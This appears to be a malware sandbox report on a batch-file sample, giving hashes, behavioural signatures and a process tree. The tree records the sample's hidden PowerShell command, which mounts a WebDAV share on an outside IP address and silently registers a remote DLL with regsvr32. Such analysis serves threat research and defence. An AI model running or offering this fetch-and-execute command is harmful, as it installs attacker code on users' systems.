Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 08:22
Static task
static1
Behavioral task
behavioral1
Sample
188801557063505556.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
188801557063505556.bat
Resource
win10v2004-20240709-en
General
-
Target
188801557063505556.bat
-
Size
23KB
-
MD5
8e9c8e3250b7a2cbe19b77dbbcdb3420
-
SHA1
9f7dcfb3b726549c38addb5e397dce1826d40753
-
SHA256
ff83e8daabc6d19fa7b967227d331950622d9c9a10334d5bc7030d0d9fd22a08
-
SHA512
c0f5a0640bb42fd34b92998b334aec40ca31509a3b16e93907f22c3dd3d0d27adcc9e58eba685ce3148eebdf1411e6f490e258bec6740fa3598f48abc017f3b8
-
SSDEEP
384:+tZmEQtnt8TcDAtJ9NPcRdUtOp7etAKqDLHj0sMqFVqkMwlmbzOtRij9O:+tZmEQtn/EPjtOwID0sM8VkWmvOtRi5O
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2732 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2732 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2788 wordpad.exe 2788 wordpad.exe 2788 wordpad.exe 2788 wordpad.exe 2788 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2236 wrote to memory of 2788 2236 cmd.exe 31 PID 2236 wrote to memory of 2788 2236 cmd.exe 31 PID 2236 wrote to memory of 2788 2236 cmd.exe 31 PID 2236 wrote to memory of 2732 2236 cmd.exe 32 PID 2236 wrote to memory of 2732 2236 cmd.exe 32 PID 2236 wrote to memory of 2732 2236 cmd.exe 32 PID 2732 wrote to memory of 2440 2732 powershell.exe 34 PID 2732 wrote to memory of 2440 2732 powershell.exe 34 PID 2732 wrote to memory of 2440 2732 powershell.exe 34 PID 2732 wrote to memory of 2556 2732 powershell.exe 35 PID 2732 wrote to memory of 2556 2732 powershell.exe 35 PID 2732 wrote to memory of 2556 2732 powershell.exe 35 PID 2732 wrote to memory of 2556 2732 powershell.exe 35 PID 2732 wrote to memory of 2556 2732 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\188801557063505556.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\15998104686307.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2440
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\15998104686307.dll3⤵PID:2556
-
-